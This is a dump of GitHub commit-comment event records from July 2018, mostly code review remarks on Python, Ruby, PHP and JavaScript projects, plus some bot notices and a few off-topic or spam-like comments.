{"id":"7974678668","type":"CommitCommentEvent","actor":{"login":"utkuozbulak"},"repo":{"name":"ugent-korea/pytorch-unet-segmentation"},"payload":{"comment":{"id":29730437,"position":4,"line":144,"path":"src/augmentation.py","commit_id":"771b1548cb1015f836bbf107e6451e8ba108cbb0","created_at":"2018-07-17T06:46:35Z","updated_at":"2018-07-17T06:46:35Z","author_association":"MEMBER","body":"why train and test have separate padding functions?\r\n\r\nyou can have a single merge function. and push the logic in this function into test dataset and call pad_ function 4 times to pad the crops"}},"created_at":"2018-07-17T06:46:35Z"}
{"id":"7974680424","type":"CommitCommentEvent","actor":{"login":"shayenr"},"repo":{"name":"DavidJohnstonCEO/DecentralizedApplications"},"payload":{"comment":{"id":29730440,"position":null,"line":null,"path":null,"commit_id":"ed5420bb93cca51719a1df7d8cb06b4ca12a1627","created_at":"2018-07-17T06:47:05Z","updated_at":"2018-07-17T06:47:05Z","author_association":"NONE","body":"In due time the world will take note of the Omni layer protocol, DexX7, the SAFE network, Tau Meta Language and a future secured by cryptography. MaidSafe will revolutionize the world. "}},"created_at":"2018-07-17T06:47:05Z"}
{"id":"7974680686","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29730441,"position":12,"line":12,"path":"Lesson1/Task4.rb","commit_id":"3b8dc6c435ae33f3e7d15b8875c93c1b9a38e8a3","created_at":"2018-07-17T06:47:09Z","updated_at":"2018-07-17T06:47:09Z","author_association":"NONE","body":"вычисление квадратного корня стоит вытащить в переменную. Сейчас это небольшая операция, но могла быть и более ресурсо-затратная операция и тогда уж лучше вычислить значение 1 раз и каждый раз его подставлять. Чем  считать каждый раз"}},"created_at":"2018-07-17T06:47:09Z"}
{"id":"7974682678","type":"CommitCommentEvent","actor":{"login":"maakep"},"repo":{"name":"maakep/cgj2018"},"payload":{"comment":{"id":29730443,"position":null,"line":null,"path":null,"commit_id":"d938c5b7140f64075f80f78eeca74f10f15522ef","created_at":"2018-07-17T06:47:41Z","updated_at":"2018-07-17T06:47:41Z","author_association":"OWNER","body":"Resources Load is very costly and something we should 100% refactor away. I'd say it's still ok to use it until we have a definitive replacement but here you use it in every Use, please cache it in the constructor or similar"}},"created_at":"2018-07-17T06:47:41Z"}
{"id":"7974686604","type":"CommitCommentEvent","actor":{"login":"utkuozbulak"},"repo":{"name":"ugent-korea/pytorch-unet-segmentation"},"payload":{"comment":{"id":29730449,"position":4,"line":171,"path":"src/augmentation.py","commit_id":"5963cc1269196adcfa3bea7865ee237abd1323b0","created_at":"2018-07-17T06:48:47Z","updated_at":"2018-07-17T06:48:47Z","author_association":"MEMBER","body":"have a single pad that just pads. Outer logic does not belong here.\r\n\r\n`y_loc, x_loc = randint(0, img_height-out_size), randint(0, img_width-out_size)`\r\n\r\n^ this is crop, this isnt even pad. You dont even need a function to crop.\r\n \r\nthis is the logic of the dataset not the pad function. Make it so that pad just pads and does nothing else"}},"created_at":"2018-07-17T06:48:47Z"}
{"id":"7974687089","type":"CommitCommentEvent","actor":{"login":"diizzyy"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29730451,"position":null,"line":null,"path":null,"commit_id":"1bad852ff597fd0535e02703f0c4b83447aaff45","created_at":"2018-07-17T06:48:55Z","updated_at":"2018-07-17T06:48:55Z","author_association":"CONTRIBUTOR","body":"Is this possibly a fix for?\r\nhttps://github.com/openwrt/openwrt/pull/1072\r\nhttps://bugs.openwrt.org/index.php?do=details&task_id=1542\r\n\r\nMany thanks for looking into it"}},"created_at":"2018-07-17T06:48:55Z"}
{"id":"7974690303","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29730452,"position":15,"line":15,"path":"Lesson1/Task4.rb","commit_id":"3b8dc6c435ae33f3e7d15b8875c93c1b9a38e8a3","created_at":"2018-07-17T06:49:48Z","updated_at":"2018-07-17T06:49:48Z","author_association":"NONE","body":"Корень из 0 будет 0. Можно это вычисление откинуть"}},"created_at":"2018-07-17T06:49:48Z"}
{"id":"7974691461","type":"CommitCommentEvent","actor":{"login":"MoneroOcean"},"repo":{"name":"MoneroOcean/nodejs-pool"},"payload":{"comment":{"id":29730454,"position":null,"line":null,"path":null,"commit_id":"cdbc9a0ab966d4721215b171c89ae068145e45e7","created_at":"2018-07-17T06:50:06Z","updated_at":"2018-07-17T06:50:06Z","author_association":"OWNER","body":"It is for case where miners mine their own algo which is most profitable on their hardware. Most development currently happen in xmrig fork to allow that."}},"created_at":"2018-07-17T06:50:06Z"}
{"id":"7974691988","type":"CommitCommentEvent","actor":{"login":"utkuozbulak"},"repo":{"name":"ugent-korea/pytorch-unet-segmentation"},"payload":{"comment":{"id":29730455,"position":22,"line":32,"path":"src/mean_std.py","commit_id":"1022ecb0dba2c651cb8a47464111e42a25c068a1","created_at":"2018-07-17T06:50:13Z","updated_at":"2018-07-17T06:50:13Z","author_association":"MEMBER","body":"you changed the function name but did not change the function call in main.\r\n\r\n\r\nTraceback (most recent call last):\r\n  File \"mean_std.py\", line 69, in <module>\r\n    print('mean:', Mean(image_path))\r\nNameError: name 'Mean' is not defined\r\n"}},"created_at":"2018-07-17T06:50:13Z"}
{"id":"7974692853","type":"CommitCommentEvent","actor":{"login":"utkuozbulak"},"repo":{"name":"ugent-korea/pytorch-unet-segmentation"},"payload":{"comment":{"id":29730456,"position":5,"line":5,"path":"src/mean_std.py","commit_id":"1022ecb0dba2c651cb8a47464111e42a25c068a1","created_at":"2018-07-17T06:50:27Z","updated_at":"2018-07-17T06:50:27Z","author_association":"MEMBER","body":"\r\n\r\nyou changed the function name but did not change the function call in main.\r\n\r\nTraceback (most recent call last):\r\nFile \"mean_std.py\", line 69, in\r\nprint('mean:', Mean(image_path))\r\nNameError: name 'Mean' is not defined\r\n"}},"created_at":"2018-07-17T06:50:27Z"}
{"id":"7974693731","type":"CommitCommentEvent","actor":{"login":"santamaria930"},"repo":{"name":"santamaria930/test_rep"},"payload":{"comment":{"id":29730459,"position":null,"line":null,"path":null,"commit_id":"b2a0445d64cd9bdca8240a94128a43a03680f0a5","created_at":"2018-07-17T06:50:42Z","updated_at":"2018-07-17T06:50:42Z","author_association":"OWNER","body":"test commit"}},"created_at":"2018-07-17T06:50:42Z"}
{"id":"7974695554","type":"CommitCommentEvent","actor":{"login":"Meren11"},"repo":{"name":"Meren11/yenidepo"},"payload":{"comment":{"id":29730461,"position":12,"line":11,"path":"README.md","commit_id":"52c541c6b0dbd74bb1e3427aaa46dca69e1e8dbc","created_at":"2018-07-17T06:51:11Z","updated_at":"2018-07-17T06:51:11Z","author_association":"OWNER","body":"function that light neopixel leds"}},"created_at":"2018-07-17T06:51:11Z"}
{"id":"7974699854","type":"CommitCommentEvent","actor":{"login":"Roket9x"},"repo":{"name":"Roket9x/My-programs"},"payload":{"comment":{"id":29730466,"position":null,"line":null,"path":null,"commit_id":"551035996f0e973d411f7d42328547f11e2a1886","created_at":"2018-07-17T06:52:19Z","updated_at":"2018-07-17T06:52:19Z","author_association":"OWNER","body":"Hello world. I'm Trung. I'm from Viet Nam. I will save My code in here"}},"created_at":"2018-07-17T06:52:19Z"}
{"id":"7974701118","type":"CommitCommentEvent","actor":{"login":"maakep"},"repo":{"name":"maakep/cgj2018"},"payload":{"comment":{"id":29730467,"position":null,"line":null,"path":null,"commit_id":"d938c5b7140f64075f80f78eeca74f10f15522ef","created_at":"2018-07-17T06:52:39Z","updated_at":"2018-07-17T06:52:39Z","author_association":"OWNER","body":"DFT? Needs a more descriptive name and probably be placed in a projectile utility class"}},"created_at":"2018-07-17T06:52:39Z"}
{"id":"7974702232","type":"CommitCommentEvent","actor":{"login":"duckonst1"},"repo":{"name":"ethereum/mist"},"payload":{"comment":{"id":29730469,"position":null,"line":null,"path":null,"commit_id":"c69ed46a688dabad6f103c35592fefbef131c2e5","created_at":"2018-07-17T06:52:55Z","updated_at":"2018-07-17T06:52:55Z","author_association":"NONE","body":"Nạna"}},"created_at":"2018-07-17T06:52:55Z"}
{"id":"7974704987","type":"CommitCommentEvent","actor":{"login":"utkuozbulak"},"repo":{"name":"ugent-korea/pytorch-unet-segmentation"},"payload":{"comment":{"id":29730472,"position":36,"line":158,"path":"src/dataset.py","commit_id":"cd2475214f4a5220c8ab298abdef810a56923531","created_at":"2018-07-17T06:53:37Z","updated_at":"2018-07-17T06:53:37Z","author_association":"MEMBER","body":"388 => self.out_size"}},"created_at":"2018-07-17T06:53:37Z"}
{"id":"7974705424","type":"CommitCommentEvent","actor":{"login":"patpursuit"},"repo":{"name":"patpursuit/psnportal"},"payload":{"comment":{"id":29730474,"position":null,"line":null,"path":null,"commit_id":"3aa229415271957b0af686eac13ca89da2bab746","created_at":"2018-07-17T06:53:43Z","updated_at":"2018-07-17T06:53:43Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Members](https://trello.com/c/VNyxjeU8/3-members)"}},"created_at":"2018-07-17T06:53:43Z"}
{"id":"7974715308","type":"CommitCommentEvent","actor":{"login":"maakep"},"repo":{"name":"maakep/cgj2018"},"payload":{"comment":{"id":29730486,"position":null,"line":null,"path":null,"commit_id":"d938c5b7140f64075f80f78eeca74f10f15522ef","created_at":"2018-07-17T06:56:11Z","updated_at":"2018-07-17T06:56:11Z","author_association":"OWNER","body":"Should the weapon be made as an weapon if the usage is explicitly for abilities? (Since you're relying on the Ability cool down)"}},"created_at":"2018-07-17T06:56:11Z"}
{"id":"7974715437","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29730487,"position":null,"line":null,"path":null,"commit_id":"50fb5bcb0c8f1c97653acd282394bdadb4e9b9ce","created_at":"2018-07-17T06:56:13Z","updated_at":"2018-07-17T06:56:13Z","author_association":"MEMBER","body":"@fabianfrz please test"}},"created_at":"2018-07-17T06:56:13Z"}
{"id":"7974718981","type":"CommitCommentEvent","actor":{"login":"utkuozbulak"},"repo":{"name":"ugent-korea/pytorch-unet-segmentation"},"payload":{"comment":{"id":29730489,"position":49,"line":166,"path":"src/dataset.py","commit_id":"cd2475214f4a5220c8ab298abdef810a56923531","created_at":"2018-07-17T06:57:08Z","updated_at":"2018-07-17T06:57:08Z","author_association":"MEMBER","body":"This function should be changed accordingly. But for the sake of the argument, let's assume that you keep it.\r\n\r\nWhy the following code?\r\n\r\ntop_left = cropped_padded[0]\r\ntop_right = cropped_padded[1]\r\nbottom_left = cropped_padded[2]\r\nbottom_right = cropped_padded[3]\r\n\r\nand the rest that use top_left, top_right etc..\r\n\r\ncropped_padded is already a list, why dont you just use it as a list? E.g:\r\n\r\nfor single_im in cropped_padded:\r\n    single_im = normalize(single_im, mean=Training_MEAN, std=Training_STDEV)\r\n    single_im = torch.from_numpy(single_im).float()\r\n    ...\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-17T06:57:08Z"}
{"id":"7974721611","type":"CommitCommentEvent","actor":{"login":"Gambitier"},"repo":{"name":"django/django"},"payload":{"comment":{"id":29730494,"position":5,"line":79,"path":"docs/topics/db/examples/many_to_one.txt","commit_id":"9d7e2c7b447b2bbabe746770ebd26465cc564f05","created_at":"2018-07-17T06:57:44Z","updated_at":"2018-07-17T06:57:44Z","author_association":"NONE","body":"got error message: django.db.utils.IntegrityError: NOT NULL constraint failed: polls_article.reporter_id\r\n\r\nreporter field is not nullable"}},"created_at":"2018-07-17T06:57:44Z"}
{"id":"7974723886","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29730497,"position":null,"line":null,"path":null,"commit_id":"e8ef43eddadd8b5ebeef4741a7a5454c558ba5e3","created_at":"2018-07-17T06:58:18Z","updated_at":"2018-07-17T06:58:18Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-288](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-288).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-288-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-17T06:58:18Z"}
{"id":"7974730081","type":"CommitCommentEvent","actor":{"login":"zaiboxu"},"repo":{"name":"Kenneth-Lee/linux-kernel-warpdrive"},"payload":{"comment":{"id":29730503,"position":null,"line":null,"path":null,"commit_id":"dea717477d1bf495ae086d570da6172af058e364","created_at":"2018-07-17T06:59:53Z","updated_at":"2018-07-17T06:59:53Z","author_association":"NONE","body":"vfio_spimdev.h should be updated also, for example: rm VFIO_SPIMDEV_CMD_SET_PASID .etc, rm int vfio_spimdev_pasid_pri_check(int pasid); .etc"}},"created_at":"2018-07-17T06:59:53Z"}
{"id":"7974734269","type":"CommitCommentEvent","actor":{"login":"job-ldy"},"repo":{"name":"job-ldy/haha"},"payload":{"comment":{"id":29730520,"position":null,"line":null,"path":null,"commit_id":"32a976fde456deebe50602c10642e84ab0b70214","created_at":"2018-07-17T07:00:52Z","updated_at":"2018-07-17T07:00:52Z","author_association":"OWNER","body":"are you kidding me?"}},"created_at":"2018-07-17T07:00:52Z"}
{"id":"7974737691","type":"CommitCommentEvent","actor":{"login":"maakep"},"repo":{"name":"maakep/cgj2018"},"payload":{"comment":{"id":29730527,"position":null,"line":null,"path":null,"commit_id":"c89c406bf1770cd602605f8434afcc1ca234dd19","created_at":"2018-07-17T07:01:42Z","updated_at":"2018-07-17T07:01:42Z","author_association":"OWNER","body":"Ah, I see you've move DFT to a utility class here. Rebasing refactoring commits is preferred but not something we should waste time on, but good to know for the real world. Basically you want the commits to represent the features straight path from NOTHING to DONE; no \"removed this again\" or \"refactor X to be little more efficient\". You'll get irrelevant comments (like the one I added for the previous commit) and I'll waste time analysing why you've made decisions that you later changed."}},"created_at":"2018-07-17T07:01:42Z"}
{"id":"7974738756","type":"CommitCommentEvent","actor":{"login":"ChenArno"},"repo":{"name":"bmfe/eros-nexus"},"payload":{"comment":{"id":29730531,"position":null,"line":null,"path":null,"commit_id":"beaa132795d0cb2bf465fc31c1216f078ce613a1","created_at":"2018-07-17T07:01:57Z","updated_at":"2018-07-17T07:01:57Z","author_association":"NONE","body":"此处删除，会导致DispatchEventCenter报错，"}},"created_at":"2018-07-17T07:01:57Z"}
{"id":"7974747459","type":"CommitCommentEvent","actor":{"login":"tongji-ldy"},"repo":{"name":"tongji-ldy/haha"},"payload":{"comment":{"id":29730541,"position":null,"line":null,"path":null,"commit_id":"32a976fde456deebe50602c10642e84ab0b70214","created_at":"2018-07-17T07:04:07Z","updated_at":"2018-07-17T07:04:07Z","author_association":"OWNER","body":"no"}},"created_at":"2018-07-17T07:04:07Z"}
{"id":"7974761264","type":"CommitCommentEvent","actor":{"login":"TyCo86"},"repo":{"name":"java-tester-x/javaexercises"},"payload":{"comment":{"id":29730557,"position":null,"line":null,"path":null,"commit_id":"791f8da9de35ca41730be3ed494c6365c5672887","created_at":"2018-07-17T07:07:37Z","updated_at":"2018-07-17T07:07:37Z","author_association":"NONE","body":"Thank you very much for helping. "}},"created_at":"2018-07-17T07:07:37Z"}
{"id":"7974764616","type":"CommitCommentEvent","actor":{"login":"suzhuo8765243"},"repo":{"name":"suzhuo8765243/gitTest_checkbox_list-CSS"},"payload":{"comment":{"id":29730562,"position":null,"line":null,"path":null,"commit_id":"184ff34b91895b6e9a2b7c54d7e422f1cafe76d7","created_at":"2018-07-17T07:08:22Z","updated_at":"2018-07-17T07:08:22Z","author_association":"OWNER","body":"你删除干嘛"}},"created_at":"2018-07-17T07:08:22Z"}
{"id":"7974765725","type":"CommitCommentEvent","actor":{"login":"vyshka"},"repo":{"name":"Jagailo/YetAnotherKeyDisplayer"},"payload":{"comment":{"id":29730567,"position":12,"line":19,"path":"RTSSCustomOSD/AssemblyInfo.cpp","commit_id":"cd53f204ecdf6c478ba6d00a994806be8bd7a1a1","created_at":"2018-07-17T07:08:40Z","updated_at":"2018-07-17T07:08:40Z","author_association":"NONE","body":"This row is very questionable"}},"created_at":"2018-07-17T07:08:40Z"}
{"id":"7974768569","type":"CommitCommentEvent","actor":{"login":"rourong"},"repo":{"name":"suzhuo8765243/gitTest_checkbox_list-CSS"},"payload":{"comment":{"id":29730570,"position":null,"line":null,"path":null,"commit_id":"184ff34b91895b6e9a2b7c54d7e422f1cafe76d7","created_at":"2018-07-17T07:09:21Z","updated_at":"2018-07-17T07:09:21Z","author_association":"COLLABORATOR","body":"好耍啊\r\n"}},"created_at":"2018-07-17T07:09:21Z"}
{"id":"7974776585","type":"CommitCommentEvent","actor":{"login":"yiy114"},"repo":{"name":"yiy114/token-profile"},"payload":{"comment":{"id":29730585,"position":null,"line":null,"path":null,"commit_id":"2ed63fd52c56e94bddc92af3535f13ed9fcc35d9","created_at":"2018-07-17T07:11:14Z","updated_at":"2018-07-17T07:11:14Z","author_association":"OWNER","body":"add suc "}},"created_at":"2018-07-17T07:11:14Z"}
{"id":"7974777051","type":"CommitCommentEvent","actor":{"login":"rodrigobdz"},"repo":{"name":"maicki/why-did-you-update"},"payload":{"comment":{"id":29730586,"position":5,"line":28,"path":"src/defaultNotifier.js","commit_id":"5243903126c2c76c13d8365e24a7156755956fee","created_at":"2018-07-17T07:11:21Z","updated_at":"2018-07-17T07:11:21Z","author_association":"NONE","body":"What do you think of this implementation? https://gist.github.com/rodrigobdz/2d0fbc0e4cf72748da025ded94f91eb7.\r\n\r\nI think it might be useful here."}},"created_at":"2018-07-17T07:11:21Z"}
{"id":"7974779923","type":"CommitCommentEvent","actor":{"login":"tstenner"},"repo":{"name":"labstreaminglayer/liblsl"},"payload":{"comment":{"id":29730591,"position":4,"line":20,"path":"src/legacy/legacy_abi.cpp","commit_id":"a9453f5397a2dbc7255c8eaeb36dcc7645e3c042","created_at":"2018-07-17T07:12:01Z","updated_at":"2018-07-17T07:12:01Z","author_association":"CONTRIBUTOR","body":"Should this be int32 or uint32?"}},"created_at":"2018-07-17T07:12:01Z"}
{"id":"7974780055","type":"CommitCommentEvent","actor":{"login":"dpaluy"},"repo":{"name":"NataliaPavliy/CryptoAddressValidator"},"payload":{"comment":{"id":29730593,"position":7,"line":66,"path":".gitignore","commit_id":"afd762ce9bccb5359e70a2d0617df62914479606","created_at":"2018-07-17T07:12:03Z","updated_at":"2018-07-17T07:12:03Z","author_association":"NONE","body":"@NataliaPavliy Why `Travis.yml` is ignored?"}},"created_at":"2018-07-17T07:12:03Z"}
{"id":"7974780259","type":"CommitCommentEvent","actor":{"login":"matthew-brett"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29730594,"position":null,"line":null,"path":null,"commit_id":"52289b6b8f1f0907c44f8006128c514ff6f2dce7","created_at":"2018-07-17T07:12:06Z","updated_at":"2018-07-17T07:12:06Z","author_association":"CONTRIBUTOR","body":"Yes, why not ..."}},"created_at":"2018-07-17T07:12:06Z"}
{"id":"7974780806","type":"CommitCommentEvent","actor":{"login":"Synchro"},"repo":{"name":"PHPMailer/PHPMailer"},"payload":{"comment":{"id":29730596,"position":43,"line":1079,"path":"src/SMTP.php","commit_id":"f4d37028af4b2f596847534566344b21d9b48b0d","created_at":"2018-07-17T07:12:14Z","updated_at":"2018-07-17T07:12:14Z","author_association":"MEMBER","body":"If that was true you would not be getting an error complaining that it has exceeded a descriptor limit of 1024. This is a problem with your environment, not your script.\n\nSent from my iPhone\n\n> On 17 Jul 2018, at 03:30, George <notifications@github.com> wrote:\n> \n> It is currently set to 100k+ so that is not the issue.\n\n"}},"created_at":"2018-07-17T07:12:14Z"}
{"id":"7974782201","type":"CommitCommentEvent","actor":{"login":"taroxd"},"repo":{"name":"rdp/ffmpeg-windows-build-helpers"},"payload":{"comment":{"id":29730597,"position":65,"line":1706,"path":"cross_compile_ffmpeg.sh","commit_id":"f4b204b98084c02ec98689c178c462a4bed07600","created_at":"2018-07-17T07:12:33Z","updated_at":"2018-07-17T07:12:33Z","author_association":"CONTRIBUTOR","body":"The spaces surrounding \"+=\" should be removed"}},"created_at":"2018-07-17T07:12:33Z"}
{"id":"7974782558","type":"CommitCommentEvent","actor":{"login":"dpaluy"},"repo":{"name":"NataliaPavliy/CryptoAddressValidator"},"payload":{"comment":{"id":29730599,"position":7,"line":66,"path":".gitignore","commit_id":"afd762ce9bccb5359e70a2d0617df62914479606","created_at":"2018-07-17T07:12:38Z","updated_at":"2018-07-17T07:12:38Z","author_association":"NONE","body":"You should  add `.DS_Store` and remove it from the code"}},"created_at":"2018-07-17T07:12:38Z"}
{"id":"7974782801","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29730600,"position":null,"line":null,"path":null,"commit_id":"e644dc51b54da339aab4206a15a24696e9df0713","created_at":"2018-07-17T07:12:42Z","updated_at":"2018-07-17T07:12:42Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 36](https://teamcity.otenv.com/viewLog.html?buildId=8948818&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **UNKNOWN**\nSummary: Canceled (Step 2/2) Build time: 00:12:19"}},"created_at":"2018-07-17T07:12:42Z"}
{"id":"7974783587","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29730601,"position":null,"line":null,"path":null,"commit_id":"ee6ef28ec61d23bb4cff3dc3c01d9264a9cb5d25","created_at":"2018-07-17T07:12:52Z","updated_at":"2018-07-17T07:12:52Z","author_association":"MEMBER","body":"@benjycui 0.29.0 本地调试刷新时会出现 `{{ content | safe }}` 的字样。"}},"created_at":"2018-07-17T07:12:52Z"}
{"id":"7974784416","type":"CommitCommentEvent","actor":{"login":"rodrigobdz"},"repo":{"name":"maicki/why-did-you-update"},"payload":{"comment":{"id":29730603,"position":5,"line":28,"path":"src/defaultNotifier.js","commit_id":"5243903126c2c76c13d8365e24a7156755956fee","created_at":"2018-07-17T07:13:03Z","updated_at":"2018-07-17T07:13:03Z","author_association":"NONE","body":"I could publish it as an npm module to reuse it here. Let me know what you think about it."}},"created_at":"2018-07-17T07:13:03Z"}
{"id":"7974784868","type":"CommitCommentEvent","actor":{"login":"dpaluy"},"repo":{"name":"NataliaPavliy/CryptoAddressValidator"},"payload":{"comment":{"id":29730605,"position":6,"line":15,"path":".travis.yml","commit_id":"afd762ce9bccb5359e70a2d0617df62914479606","created_at":"2018-07-17T07:13:10Z","updated_at":"2018-07-17T07:13:10Z","author_association":"NONE","body":"@NataliaPavliy travis.yml is incorrect"}},"created_at":"2018-07-17T07:13:10Z"}
{"id":"7974785782","type":"CommitCommentEvent","actor":{"login":"hamza8974"},"repo":{"name":"BDTProject/BitcoinDiamondToken"},"payload":{"comment":{"id":29730607,"position":null,"line":null,"path":null,"commit_id":"bd792c27fd5aba378a44526e093ac871272bb7a8","created_at":"2018-07-17T07:13:22Z","updated_at":"2018-07-17T07:13:22Z","author_association":"NONE","body":"0x84e5D0780E7ff15e8Cf63620486948E9fA3Fa3f9"}},"created_at":"2018-07-17T07:13:22Z"}
{"id":"7974787208","type":"CommitCommentEvent","actor":{"login":"dpaluy"},"repo":{"name":"NataliaPavliy/CryptoAddressValidator"},"payload":{"comment":{"id":29730609,"position":16,"line":14,"path":"README.md","commit_id":"afd762ce9bccb5359e70a2d0617df62914479606","created_at":"2018-07-17T07:13:42Z","updated_at":"2018-07-17T07:13:42Z","author_association":"NONE","body":"@NataliaPavliy How to build the code?"}},"created_at":"2018-07-17T07:13:42Z"}
{"id":"7974788340","type":"CommitCommentEvent","actor":{"login":"kkanjariya"},"repo":{"name":"kkanjariya/app"},"payload":{"comment":{"id":29730611,"position":21,"line":21,"path":"app/Http/Controllers/HomeController.php","commit_id":"0053409b9d438f19e0edf326f8e90088bc57c197","created_at":"2018-07-17T07:13:59Z","updated_at":"2018-07-17T07:13:59Z","author_association":"OWNER","body":"hh"}},"created_at":"2018-07-17T07:13:59Z"}
{"id":"7974791947","type":"CommitCommentEvent","actor":{"login":"aman313"},"repo":{"name":"allenai/allennlp"},"payload":{"comment":{"id":29730621,"position":31,"line":169,"path":"allennlp/commands/fine_tune.py","commit_id":"0312b16e23263d24401d7d89b8c327fa0b7259c3","created_at":"2018-07-17T07:14:48Z","updated_at":"2018-07-17T07:14:48Z","author_association":"NONE","body":"Thanks a lot for those pointers. Extremely helpful. Cheers."}},"created_at":"2018-07-17T07:14:48Z"}
{"id":"7974794125","type":"CommitCommentEvent","actor":{"login":"Kalebn0"},"repo":{"name":"hhvm/oss-performance"},"payload":{"comment":{"id":29730627,"position":null,"line":null,"path":null,"commit_id":"03a4ff1e726333cf0618ce5d956b1aceac726001","created_at":"2018-07-17T07:15:19Z","updated_at":"2018-07-17T07:15:19Z","author_association":"NONE","body":"@web-flow \r\n\r\n> ### \r\n\r\n- [kkk\r\n\r\n- [ ] 1. \r\n\r\n](url)"}},"created_at":"2018-07-17T07:15:19Z"}
{"id":"7974796766","type":"CommitCommentEvent","actor":{"login":"Kalebn0"},"repo":{"name":"hhvm/oss-performance"},"payload":{"comment":{"id":29730634,"position":null,"line":null,"path":null,"commit_id":"03a4ff1e726333cf0618ce5d956b1aceac726001","created_at":"2018-07-17T07:15:57Z","updated_at":"2018-07-17T07:15:57Z","author_association":"NONE","body":"The  new  York  City  new  one  of  those  people  who  want  the  best  way  for  the  first  time  thank u"}},"created_at":"2018-07-17T07:15:57Z"}
{"id":"7974796986","type":"CommitCommentEvent","actor":{"login":"azeier"},"repo":{"name":"HearthSim/hsredshift"},"payload":{"comment":{"id":29730635,"position":116,"line":116,"path":"archiving/partitions.py","commit_id":"026c56fd9616557364d007b28ce84eb15fd5b8ea","created_at":"2018-07-17T07:16:00Z","updated_at":"2018-07-17T07:16:00Z","author_association":"MEMBER","body":"Should be `_CREATE_TEMP_TABLE`"}},"created_at":"2018-07-17T07:16:00Z"}
{"id":"7974798269","type":"CommitCommentEvent","actor":{"login":"rezhajulio"},"repo":{"name":"nsiregar/pegelinux"},"payload":{"comment":{"id":29730636,"position":null,"line":null,"path":null,"commit_id":"9061bbd4b7a1d2860ba82f847be7c9a71862c131","created_at":"2018-07-17T07:16:17Z","updated_at":"2018-07-17T07:16:17Z","author_association":"COLLABORATOR","body":"copy docker-compose.yml.example jadi docker-compose.yml\r\nbisa edit2 sepuasnya.\r\ndi production juga gitu"}},"created_at":"2018-07-17T07:16:17Z"}
{"id":"7974801895","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki-contrib/blockly"},"payload":{"comment":{"id":29730642,"position":5,"line":5,"path":"blocks/env_variables.js","commit_id":"d500c11c0596367bc4cbfb55dff0327032dc8b39","created_at":"2018-07-17T07:17:12Z","updated_at":"2018-07-17T07:17:12Z","author_association":"MEMBER","body":"Why is this file copyright to google when you coded it and even more so for the XWiki project?\r\n"}},"created_at":"2018-07-17T07:17:12Z"}
{"id":"7974802102","type":"CommitCommentEvent","actor":{"login":"taeyoon-kim"},"repo":{"name":"taeyoon-kim/TIL"},"payload":{"comment":{"id":29730643,"position":null,"line":null,"path":null,"commit_id":"a0344557d968a235af8bc6706f50073acfb48ead","created_at":"2018-07-17T07:17:15Z","updated_at":"2018-07-17T07:17:15Z","author_association":"OWNER","body":"참고한 영상: https://www.youtube.com/watch?v=tC8Xj_Bf8Fw"}},"created_at":"2018-07-17T07:17:15Z"}
{"id":"7974803890","type":"CommitCommentEvent","actor":{"login":"duxiulong"},"repo":{"name":"koolay/scmt"},"payload":{"comment":{"id":29730648,"position":null,"line":null,"path":null,"commit_id":"cf4d06d21b534c2db80141159aa1fc4f5dd0dff0","created_at":"2018-07-17T07:17:41Z","updated_at":"2018-07-17T07:17:41Z","author_association":"NONE","body":"why not support C++,  almost same with php"}},"created_at":"2018-07-17T07:17:41Z"}
{"id":"7974805478","type":"CommitCommentEvent","actor":{"login":"desht"},"repo":{"name":"TeamPneumatic/pnc-repressurized"},"payload":{"comment":{"id":29730651,"position":19,"line":19,"path":"documentation/TechTreeRemarksAndProposal.md","commit_id":"a0a615d64a9cbd5ee436dc5f1201cfa14776f076","created_at":"2018-07-17T07:18:06Z","updated_at":"2018-07-17T07:18:06Z","author_association":"COLLABORATOR","body":"Also, the Charging Station: tier 1 can only charge items up to 5 bar.  You need tier 2 to get to 10 bar."}},"created_at":"2018-07-17T07:18:06Z"}
{"id":"7974805504","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki-contrib/blockly"},"payload":{"comment":{"id":29730652,"position":null,"line":null,"path":null,"commit_id":"d500c11c0596367bc4cbfb55dff0327032dc8b39","created_at":"2018-07-17T07:18:07Z","updated_at":"2018-07-17T07:18:07Z","author_association":"MEMBER","body":"This looks unmaintainable with so many duplications."}},"created_at":"2018-07-17T07:18:07Z"}
